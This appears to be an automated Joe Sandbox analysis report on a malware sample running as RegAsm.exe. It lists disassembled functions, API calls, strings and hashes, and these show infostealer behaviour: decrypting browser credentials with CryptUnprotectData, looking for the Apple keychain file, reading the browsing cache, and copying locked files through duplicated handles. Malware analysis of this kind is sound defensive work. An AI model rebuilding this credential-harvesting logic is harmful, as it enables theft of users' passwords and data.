Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20

Function 0044F30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0044F30A
GetCommandLineW.KERNEL32 ref: 0044F315

Strings

82q, xrefs: 0044F310

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: 82q
API String ID: 3253501508-525039841
Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Analysis Process: RegAsm.exePID: 4044, Parent PID: 3832COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	9.2%
Signature Coverage:	0%
Total number of Nodes:	1990
Total number of Limit Nodes:	56

Executed Functions

Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040DDAD

Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
_wcsicmp.MSVCRT ref: 0040DEB2
_wcsicmp.MSVCRT ref: 0040DEC5
_wcsicmp.MSVCRT ref: 0040DED8
OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
memset.MSVCRT ref: 0040DF5F
CloseHandle.KERNEL32(C0000004), ref: 0040DF92
_wcsicmp.MSVCRT ref: 0040DFB2
CloseHandle.KERNEL32(00000104), ref: 0040DFF2

Strings

dllhost.exe, xrefs: 0040DEA9
taskhost.exe, xrefs: 0040DEBD
taskhostex.exe, xrefs: 0040DED0

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
API String ID: 2018390131-3398334509
Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
??3@YAXPAX@Z.MSVCRT ref: 00418803

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
String ID:
API String ID: 2947809556-0
Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769

Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884

FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
String ID:
API String ID: 1945712969-0
Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69

Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755

Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041898C
GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004455C2
wcsrchr.MSVCRT ref: 004455DA
memset.MSVCRT ref: 0044570D
memset.MSVCRT ref: 00445725

Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C

Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2

memset.MSVCRT ref: 0044573D
memset.MSVCRT ref: 00445755
memset.MSVCRT ref: 004458CB
memset.MSVCRT ref: 004458E3
memset.MSVCRT ref: 0044596E
memset.MSVCRT ref: 00445A10
memset.MSVCRT ref: 00445A28
memset.MSVCRT ref: 00445AC6

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7

memset.MSVCRT ref: 00445B52
memset.MSVCRT ref: 00445B6A
memset.MSVCRT ref: 00445C9B
memset.MSVCRT ref: 00445CB3
_wcsicmp.MSVCRT ref: 00445D56
memset.MSVCRT ref: 00445B82

Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C

Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04

memset.MSVCRT ref: 00445986

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Strings

Apple Computer\Preferences\keychain.plist, xrefs: 00445CD0
*.*, xrefs: 00445ED0

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
String ID: *.*$Apple Computer\Preferences\keychain.plist
API String ID: 381723030-3798722523
Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514

SetErrorMode.KERNEL32(00008001), ref: 00412799
GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9

Strings

, xrefs: 004127CD
/deleteregkey, xrefs: 00412833
/savelangfile, xrefs: 00412805

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 1442760552-28296030
Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040B71C

Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D

wcsrchr.MSVCRT ref: 0040B738
memset.MSVCRT ref: 0040B756
memset.MSVCRT ref: 0040B7F5
CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
CloseHandle.KERNEL32(00000000), ref: 0040B838
memset.MSVCRT ref: 0040B851
memset.MSVCRT ref: 0040B8CA
memcmp.MSVCRT ref: 0040B9BF

Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498

memset.MSVCRT ref: 0040BB53
memcpy.MSVCRT ref: 0040BB66
LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D

Strings

v10, xrefs: 0040B9B7
chp, xrefs: 0040B817

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
String ID: chp$v10
API String ID: 229402216-2783969131
Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
memset.MSVCRT ref: 00413D7F
Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
memset.MSVCRT ref: 00413E07
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
CloseHandle.KERNEL32(?), ref: 00413EA8
??3@YAXPAX@Z.MSVCRT ref: 00413EC1
Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
CloseHandle.KERNEL32(00000000), ref: 00413F1A

Strings

QueryFullProcessImageNameW, xrefs: 00413E46
kernel32.dll, xrefs: 00413E37

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 3791284831-1740548384
Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4

Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85

Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
CloseHandle.KERNEL32(?), ref: 0040E13E
CloseHandle.KERNEL32(00000000), ref: 0040E143
CloseHandle.KERNEL32(?), ref: 0040E148
CloseHandle.KERNEL32(?), ref: 0040E14D

Strings

bhv, xrefs: 0040E0DD

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
String ID: bhv
API String ID: 4234240956-2689659898
Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
__set_app_type.MSVCRT ref: 00446762
__p__fmode.MSVCRT ref: 00446777
__p__commode.MSVCRT ref: 00446785
__setusermatherr.MSVCRT ref: 004467B1
_initterm.MSVCRT ref: 004467C7
GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
_initterm.MSVCRT ref: 004467FD
GetStartupInfoW.KERNEL32(?), ref: 0044685A
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
exit.MSVCRT ref: 00446897
_cexit.MSVCRT ref: 0044689D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 2791496988-0
Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C298

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629

Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
wcschr.MSVCRT ref: 0040C324
wcschr.MSVCRT ref: 0040C344
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
GetLastError.KERNEL32 ref: 0040C373
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
FindCloseUrlCache.WININET(?), ref: 0040C3B0

Strings

visited:, xrefs: 0040C308

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
String ID: visited:
API String ID: 2470578098-1702587658
Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1

memset.MSVCRT ref: 0040E1BD

Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B

??3@YAXPAX@Z.MSVCRT ref: 0040E28B

Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69

Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20

_snwprintf.MSVCRT ref: 0040E257

Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F

Strings

ContainerId, xrefs: 0040E1FC
Containers, xrefs: 0040E195
Name, xrefs: 0040E209
, xrefs: 0040E1D8
Container_%I64d, xrefs: 0040E246

Memory Dump Source

